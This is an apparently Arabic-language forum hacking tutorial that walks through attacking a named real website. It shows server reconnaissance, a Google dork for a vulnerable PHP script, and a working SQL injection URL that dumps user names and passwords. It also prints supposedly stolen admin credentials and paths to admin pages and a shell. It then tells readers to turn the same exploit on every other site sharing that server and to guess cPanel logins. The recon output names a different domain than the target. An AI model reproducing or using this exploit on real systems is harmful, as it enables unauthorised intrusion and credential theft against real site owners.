الدرس الاول استهداف الموقع و استخراج السيرفر
كود PHP:
http://mckitchens.com/
الموقع المستهدف نستخرج السيرفر من عدة مواقع منها
كود PHP:
www.whois.net/
www.raynette.fr/services/whois/
whois.domaintools.com/
www.whois.sc/
نستعمل موقع هذا احسن لنخرج السيرفر
كود PHP:
news.netcraft.com/
نكتب الموقع علي الشكل التالي
ثم نظغط علي raport
السيرفر هو
كود PHP:
IP address 209.234.251.93 Site rank 201
Country US Nameserver ns1.drudgereport.com
Date first seen April 1997 DNS admin __hostmaster@drudgereport.com
Domain Registrar networksolutions.com Reverse DNS unknown
Organisation Drudge, Matt, PO Box 459ATTN DRUDGEREPORT.COM, care of Network Solutions, Drums, Panama Nameserver Organisation Drudge, Matt, PO Box 459ATTN DRUDGEREPORT.COM, care of Network Solutions, Drums, Panama
الدرس الثاني اكتشاف الثغرات في الموقع
اول شي نروح لل
نكتب كما موجود للبحث عن الثغرات مع اني كنت اتصفح فلموقع فلقيت سكريبت
كود PHP:
panorama-viewer.php?id=
يعني سنبحث عن ثغرات SQL injection
نكتب شبه دورك
كود PHP:
inurl:"panorama-viewer.php?id="
سنجد كثير مواقع منها موقعنا اي يعني انه مصاب اوكي عملنا كل شي الا الاستغلال
روح لموقع ثغرات نكتب
كود PHP:
chercher : inurl:"panorama-viewer.php?id="
يعني طلعتلنا الثغرة
الدرس الثالث اختراق الموقع
اوكي الدورك هنا
كود PHP:
Google search: inurl:panorama-viewer.php?id=
الاستغلال
كود PHP:
http://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--
[-] http://server/adm/users.php
[-] http://server/adm/panorama_edit.php?id=1
[-] http://server/listimages/shell.php
الموقع المستهدف
كود PHP:
http://mckitchens.com/panorama-viewer.php?id=1
تم الاختراق
كود PHP:
http://mckitchens.com/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--
معلومات الادمين
كود PHP:
JOHNZ3CABN:MCKMIS89A3F,GINNYUZ3R:*P255W0RD407
الدرس الرابع استخراج مواقع السيرفر
كود PHP:
http://www.yougetsignal.com/tools/web-sites-on-web-server/
الموقع يخرج مواقع السيرفر و انت طبق عليهم الثفرة
ثم نفتح الnotepad
نضع المواقع و نحذف منها com net org etc
نسجل الملف تيكست نصي ونفتحه بالmicrosoft accés
نضع الموشر في الثمانين
مبروك عليك اليوزرات ثم خمن علي السي بانل
تحياتي لكم يا عناكب
pwvdh : hsji]ht l,ru , h;jaht eyvhj el hsjovh[ hgsdvtv hgl,hru hgjhfum hsji]htih hgd,.vhj